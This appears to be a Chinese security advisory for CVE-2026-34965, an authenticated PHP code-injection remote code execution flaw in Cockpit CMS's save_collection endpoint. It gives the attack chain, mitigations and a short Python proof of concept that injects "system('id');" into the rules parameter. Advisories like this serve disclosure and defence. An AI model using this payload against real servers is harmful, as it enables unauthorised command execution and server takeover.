CVE-2026-34965 CVSS 8.8 高危

CVE-2026-34965 Cockpit CMS认证远程代码执行漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34965

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cockpit CMS

漏洞概述

Cockpit CMS存在严重的认证远程代码执行漏洞。由于/cockpit/collections/save_collection接口未严格过滤用户输入，拥有集合管理权限的攻击者可以在认证状态下，向集合规则参数注入任意PHP代码。这些恶意代码会被直接写入服务器端的PHP文件，随后通过include()函数被动态加载执行，从而允许攻击者在底层服务器上执行任意系统命令。

技术细节

该漏洞根源在于Cockpit CMS在处理集合保存逻辑时，未能对“rules”等关键参数进行严格的类型检查和代码过滤。当具备集合管理权限的认证用户向/cockpit/collections/save_collection端点发起请求时，攻击者能够构造特殊的Payload，将恶意的PHP代码注入到规则的参数值中。后端程序在处理这些数据时，直接将其写入服务器端的PHP配置文件或集合定义文件中，缺乏必要的转义处理。随后，当系统通过include()函数动态加载并解析这些被污染的文件以应用业务逻辑时，其中嵌入的恶意PHP代码将被PHP解释器直接执行。这种“存储型”代码注入方式使得攻击者能够绕过常规的Web应用防火墙，以Web服务器的运行身份执行任意系统命令，实现对服务器的完全控制。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点运行的是Cockpit CMS，并确认存在/cockpit/collections/save_collection接口。

STEP 2

初始访问

攻击者获取一个具有集合管理权限的低权限账户凭证，完成身份验证。

STEP 3

漏洞利用

攻击者向/cockpit/collections/save_collection端点发送特制的POST请求，在rules参数中注入恶意的PHP代码。

STEP 4

代码执行

服务器将恶意代码写入PHP文件，并在后续通过include()函数加载该文件时执行代码，从而在服务器上运行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://localhost:8080/cockpit/collections/save_collection"

# Authenticated session cookie (Required)
cookies = {
    "cockpit": "valid_session_token_here"
}

# Malicious payload injecting PHP code into the 'rule' parameter
# The PHP system command will be written to a file and executed
payload_data = {
    "data": {
        "name": "vulnerable_collection",
        "rules": [
            {
                # Injecting PHP code to execute 'id' command
                "rule": "system('id');"
            }
        ]
    }
}

try:
    response = requests.post(target_url, json=payload_data, cookies=cookies)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the server logs or trigger the collection include to execute the code.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Cockpit CMS (Commit 494765e 之前)

防御指南

临时缓解措施

建议立即升级至修复了该漏洞的最新版本。如果暂时无法升级，应严格限制拥有集合管理权限的用户账户，并检查服务器日志中是否存在异常的集合保存操作。同时，可通过WAF规则拦截针对/cockpit/collections/save_collection接口的包含恶意PHP语法的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表